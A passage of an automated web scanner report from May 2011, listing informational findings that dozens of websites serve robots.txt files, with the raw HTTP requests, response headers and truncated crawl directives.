Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://hypetrak.com/sitemap.xml.gz

27.842. http://www.i-learninghelp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.i-learninghelp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.i-learninghelp.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:35 GMT
Server: Apache/2.2.16 (Fedora)
Content-length: 23
Last-Modified: Wed, 23 Sep 2009 23:40:00 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Allow: /

27.843. http://www.ib-ibi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ib-ibi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ib-ibi.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 20 Nov 2010 00:06:06 GMT
Accept-Ranges: bytes
ETag: "9c851ba4688cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:34:16 GMT
Connection: close
Content-Length: 937

...# robots.txt generated at http://www.mcanerin.com
User-agent: Googlebot
Disallow: /
User-agent: googlebot-image
Disallow: /
User-agent: googlebot-mobile
Disallow: /
User-agent: MSNBot
Disal
...[SNIP]...

27.844. http://www.iberia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iberia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iberia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:32 GMT
Content-length: 2932
Content-type: text/plain
Last-modified: Thu, 07 Apr 2011 08:26:14 GMT
Connection: close

User-Agent: *
Disallow: /default.htm
Disallow: /default.html
Disallow: /OneToOne/v3/paHomeTicketPage.do
Disallow: /OneToOne/gateway_es.jsp
Disallow: /qos.html
Disallow: /notfound.html
Disallow: /discu
...[SNIP]...

27.845. http://www.icejerseys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icejerseys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icejerseys.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 04:51:03 GMT
ETag: "36a0705-1e-d623dbc0"
Accept-Ranges: bytes
Content-Length: 30
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cart/

27.846. http://www.iconfinder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iconfinder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iconfinder.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Apr 2010 13:15:18 GMT
Accept-Ranges: bytes
Content-Length: 39
Cache-Control: max-age=62208000
Expires: Tue, 23 Apr 2013 02:29:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ajax/
Allow: /

27.847. http://www.iconofan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iconofan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iconofan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:54 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Tue, 20 Jul 2004 11:42:24 GMT
ETag: "79502b-160-c7738800"
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/plain

User-agent: Mag-Net
Disallow: /

User-agent: Wget
Disallow: /

User-agent: SlySearch
Disallow: *

User-agent: SSM Agent 1.0
Disallow: /

User-agent: Microsoft URL Control
Disallow: /


User-agent: *

...[SNIP]...

27.848. http://www.icr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icr.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icr.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:59:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 17 Jan 2011 18:08:00 GMT
ETag: "200315-fe-49a0eaa0c6000"
Accept-Ranges: bytes
Content-Length: 254
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /generator/
Disallow: /css/
Disallow: /flash/
Disallow: /fckeditor/
Disallow: /js/
Disallow: /pdf/
Disallow: /stage/
Disallow: /test/
Disallow: /t
...[SNIP]...

27.849. http://www.idahopower.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idahopower.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idahopower.com

Response

HTTP/1.1 200 OK
Content-Length: 100
Content-Type: text/plain
Content-Location: http://www.idahopower.com/robots.txt
Last-Modified: Mon, 07 Mar 2011 16:56:19 GMT
Accept-Ranges: bytes
ETag: "807b5f94e8dccb1:28ea"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:07:33 GMT
Connection: close
Set-Cookie: TSd4791c=83e17ceb0cd9fee0c1327d5941c6a9e5a9c5922a3f52370d4dc0d105; Path=/

User-agent: *
Disallow: /EnergyEfficiency/Business/Programs/CustomEfficiency/DSRs.cfm
Allow: /


27.850. http://www.idealloansdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idealloansdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idealloansdirect.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:04 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Last-Modified: Wed, 05 Jan 2011 19:43:56 GMT
ETag: "1fe679e-e7-4d24c9fc"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.851. http://www.ifcj.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ifcj.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ifcj.org

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 1
Date: Wed, 04 May 2011 01:32:43 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 60
ETag: "d1dc2d-1ae-4d43097f"
Server: Apache
Last-Modified: Fri, 28 Jan 2011 18:22:55 GMT
Accept-Ranges: bytes
Content-Length: 430
Content-Type: text/plain

# $Header: /home/cvs/cvsroot/site_data/001/00000001/static_data/robots.txt,v 1.4 2001/09/13 00:25:08 dave Exp $
User-agent: *
Disallow: /site/Calendar
Disallow: /site/TellAFriend
Disallow: /site/UserL
...[SNIP]...

27.852. http://www.igirlsgames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igirlsgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igirlsgames.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:41 GMT
Server: Apache
Last-Modified: Fri, 28 May 2010 00:35:16 GMT
ETag: "1788f1b-16-4879cae507900"
Accept-Ranges: bytes
Content-Length: 22
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.853. http://www.iieq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iieq.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iieq.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:10 GMT
Server: Apache
Last-Modified: Tue, 29 Jul 2008 06:51:14 GMT
ETag: "8e0029-4c-4532410e1bc80"
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=600, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: AboutUsBot
Disallow: /

User-agent: Googlebot
Disallow: /

27.854. http://www.illinoisproperty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinoisproperty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.illinoisproperty.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:07:48 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 369
Content-Type: text/html
Set-Cookie: rnmID=; expires=Fri, 28-May-2010 07:00:00 GMT; path=/
Set-Cookie: rnSessionID=652683585802062127; path=/
Set-Cookie: rnCoID=62; path=/
Set-Cookie: ASPSESSIONIDAQSBCCTB=BGDPKCFAILKGHLJOOALOKKPO; path=/
Cache-control: private

User-agent: PropsmartCrawler
Disallow: /

User-agent: OmniExplorer
Disallow: /

User-agent: *
Disallow: /scripts/
Disallow: *?p=buildsavedsearch.asp
Disallow: *?p=findagent.asp
Disallow: *?p
...[SNIP]...

27.855. http://www.illroots.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illroots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.illroots.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:22:44 GMT
Server: Apache/2.0.54
Last-Modified: Fri, 28 Jan 2011 01:52:13 GMT
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /board/
Allow: /


27.856. http://www.imagefra.me/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imagefra.me
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imagefra.me

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:04 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Thu, 23 Dec 2010 09:35:08 GMT
ETag: "b7d3d-47-4981095dc8b00"
Accept-Ranges: bytes
Content-Length: 71
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8


User-Agent: *
Disallow: /report/

User-agent: *
Crawl-delay: 10

27.857. http://www.imapp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imapp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imapp.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 03 Nov 2010 19:22:40 GMT
ETag: "19101f3-105-4942af6faa000"
Accept-Ranges: bytes
Content-Length: 261
Connection: close
Content-Type: text/plain

# \robots.txt created 12-16-08 updated 10-29-09
User-agent: *
Disallow: /_cgi/
Disallow: /images/
Disallow: /_css/
Disallow: /_js/
Disallow: /UserGuides/
Disallow: /contact-us/?id
Disallow: /d
...[SNIP]...

27.858. http://www.imodules.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imodules.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imodules.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 747
Content-Type: text/plain
Expires: -1
From: mailer2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 04 May 2011 02:09:55 GMT
Connection: close

User-agent: *
Disallow: /app_themes/
Disallow: /admin/
Disallow: /aspnet_client/
Disallow: /licenses/
Disallow: /RadControls/
Disallow: /recurring_billing/
Disallow: /test/
Disallow: /cache_xm
...[SNIP]...

27.859. http://www.imomstube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imomstube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imomstube.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:56:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 31 Aug 2010 11:14:13 GMT
ETag: "2241829-3a-48f1cae4d4b40"
Accept-Ranges: bytes
Content-Length: 58

User-agent: *
Disallow: /cgi-bin/te/webmaster.cgi
Allow: /

27.860. http://www.impactlab.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.impactlab.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.impactlab.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Apr 2009 13:25:34 GMT
ETag: "15da764-63-f3232f80"
Accept-Ranges: bytes
Content-Length: 99
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin

Sitemap: http://www.impactlab.com/sitemap.xml

27.861. http://www.impalas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.impalas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.impalas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:59:33 GMT
Server: Apache
Last-Modified: Tue, 22 Sep 2009 13:16:10 GMT
ETag: "f08400-2f1-66dc3a80"
Accept-Ranges: bytes
Content-Length: 753
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /cgi-bin/
Disallow: /*?
Disallow: /catalog/
Disallow: /search.php
Disallow: /cart.php
Disallow: /help.php
Disallow: /giftcert.php
Disallow: /product.php
Disallow: /orde
...[SNIP]...

27.862. http://www.imreportcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imreportcard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imreportcard.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 07:25:28 GMT
ETag: "d9ca99-85-2bd54a00"
Accept-Ranges: bytes
Content-Length: 133
P3P: policyref="http://www.imreportcard.com/w3c/p3p.xml", CP="CURi ADMo DEVo OUR IND DSP ALL COR"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /misc/
Disallow: /o/
Sitemap: http://www.imreportcard.com/sitemap.xml

27.863. http://www.imshopping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imshopping.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imshopping.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Wed, 04 May 2011 02:44:17 GMT
Content-Type: text/plain
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10vzgrryeajgs;Path=/
Content-Length: 79
Last-Modified: Thu, 19 Aug 2010 19:17:06 GMT

User-agent: *
Disallow:

Sitemap: http://www.imshopping.com/sitemap.xml


27.864. http://www.inautix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inautix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inautix.com

Response

HTTP/1.1 200 OK
Server: Pershing LLC
Date: Wed, 04 May 2011 01:39:23 GMT
Set-Cookie: JSESSIONID=7A03210CC1D4EC233DA7407C3B86EF69; Path=/cps
Set-Cookie: RedDotLiveServerSessionID_inautix=SID-D6B49841-03A9F592; Path=/
Expires: Wed, 04 May 2011 01:36:01 GMT
Date: Wed, 04 May 2011 01:36:01 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Connection: close

User-agent: *
Disallow: /*sign_in.html
Disallow: /*register.html
Disallow: /*sign_out.html
Disallow: /*edit_profile.html
Sitemap: http://www.inautix.com/sitemap.xml


27.865. http://www.indastro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indastro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indastro.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:30:21 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 29 May 2010 04:48:04 GMT
ETag: "1b22170-7e-543d2900"
Accept-Ranges: bytes
Content-Length: 126
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt generated at http://www.indastro.com/

User-agent: *
Disallow: /db

Sitemap: http://www.indastro.com/sitemap.xml

27.866. http://www.indianagazette.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianagazette.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indianagazette.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2049384
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:37:01 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0418
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: indianagazette.com
X-TNCMS-Served-By: cmsapp5
Content-Length: 1683

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.867. http://www.indiebound.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indiebound.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indiebound.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:40 GMT
Server: Apache/2.2.16 (EL)
Last-Modified: Wed, 21 Apr 2010 19:08:19 GMT
ETag: "39990-648-484c3eac34ec0"
Accept-Ranges: bytes
Content-Length: 1608
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:29:40 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: SERVERID=Vonnegut.booksense.local; path=/
Cache-control: private

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.868. http://www.indiemerchstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indiemerchstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indiemerchstore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:20 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0c PHP/5.2.16 with Suhosin-Patch
Last-Modified: Wed, 24 Jun 2009 22:42:40 GMT
ETag: "ee-46d1fd31ab800"
Accept-Ranges: bytes
Content-Length: 238
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /account/
Disallow: /admin/
Disallow: /cart/
Disallow: /cgi-bin/
Disallow: /checkout/
Disallow: /login/
Disallow: /logout/
Disallow: /manage/
Disallow: /maint
...[SNIP]...

27.869. http://www.individualhealthquotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.individualhealthquotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.individualhealthquotes.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
ETag: "+abZupZsS77"
Last-Modified: Mon, 04 Jan 2010 20:16:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Wed, 04 May 2011 00:59:09 GMT
Content-Type: text/plain
Content-Length: 4947
Date: Wed, 04 May 2011 00:59:04 GMT

User-agent: *
Disallow: /aetna-health-insurance.jsp
Disallow: /aetna.jsp
Disallow: /affordable-health-insurance.jsp
Disallow: /affordable-health-insurance-quotes.jsp
Disallow: /ams.jsp
Disallow: /anth
...[SNIP]...

27.870. http://www.informz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.informz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.informz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:01:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.Informz.com/xmlrpc.php
Set-Cookie: PHPSESSID=b41e9hmfm1hk596quqrb1ls436; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.informz.com/sitemap.xml.gz

27.871. http://www.inoutstar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inoutstar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inoutstar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:15 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 23 Jan 2008 14:48:12 GMT
Accept-Ranges: bytes
Content-Length: 4852
Connection: close
Content-Type: text/plain

Sitemap: http://www.inoutstar.com/sitemap_index.xml

User-agent: Mediapartners-Google*
Disallow:

User-agent: NPBot
Disallow: /

User-agent: grub-client
Disallow: /

User-agent: grub
Disallow: /

Use
...[SNIP]...

27.872. http://www.inquisiteasp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inquisiteasp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inquisiteasp.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/plain
Content-Location: http://www.inquisiteasp.com/robots.txt
Date: Wed, 04 May 2011 01:17:48 GMT
Accept-Ranges: bytes
ETag: "b24f5694f990c81:47761"
Connection: close
Last-Modified: Fri, 28 Mar 2008 17:31:39 GMT
X-Powered-By: ASP.NET
Content-Length: 28

User-agent: *
Disallow: /

27.873. http://www.insidethehall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insidethehall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insidethehall.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:05:04 GMT
Content-Type: text/plain
Content-Length: 599
Last-Modified: Sat, 24 Jul 2010 14:22:33 GMT
Connection: close
Accept-Ranges: bytes

Sitemap: http://www.insidethehall.com/sitemap.xml

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-c
...[SNIP]...

27.874. http://www.inspectionnews.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inspectionnews.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inspectionnews.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Last-Modified: Sat, 04 Aug 2007 09:04:19 GMT
ETag: "c040d62-44-436dbf5f42ac0"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /live/
Disallow: /Vback/

27.875. http://www.instantssl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instantssl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instantssl.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:45:17 GMT
Content-Type: text/plain
Content-Length: 8921
Last-Modified: Thu, 03 Sep 2009 17:01:40 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /ssl-certificate-images/
Disallow: /javascript/
Disallow: /ssl-certificate-css/
Disallow: /ssl-certificate-support/reseller/
Disallow: /live-support.html
Disallow: /ssl-c
...[SNIP]...

27.876. http://www.instaproofs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instaproofs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instaproofs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:16 GMT
Server: Apache
Last-Modified: Tue, 09 Nov 2010 20:47:05 GMT
ETag: "153503-142-494a4d7eca440"
Accept-Ranges: bytes
Content-Length: 322
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum
Disallow: /productimages
Disallow: /admin
Disallow: /templates
Disallow: /images
Disallow: /includes
Disallow: privacy.html

User-agent: AdsBot-Google
Disallow: /forum
D
...[SNIP]...

27.877. http://www.instinctbasedmedicine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instinctbasedmedicine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instinctbasedmedicine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:29 GMT
Server: Apache
X-Pingback: http://instinctbasedmedicine.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.878. http://www.instrumentalsavings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instrumentalsavings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instrumentalsavings.com

Response

HTTP/1.1 200 OK
Content-Length: 33
Content-Type: text/plain
Last-Modified: Wed, 03 Nov 2010 03:50:07 GMT
Accept-Ranges: bytes
ETag: "9808b34a7bcb1:1893"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:56:42 GMT
Connection: close

User-agent:*
Disallow: /cgi-bin/

27.879. http://www.insure-your-ride.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insure-your-ride.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insure-your-ride.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:46 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 13 Apr 2011 14:43:54 GMT
ETag: "2415c-cc-4a0cdd67b7e80"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: WILDCAT_SERVER=4; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.880. http://www.integrativelogic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integrativelogic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.integrativelogic.com

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Tue, 06 May 2008 20:07:52 GMT
Accept-Ranges: bytes
ETag: "f65543ddb4afc81:7cfa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:36:45 GMT
Connection: close

User-agent: *
Disallow: /_mm/
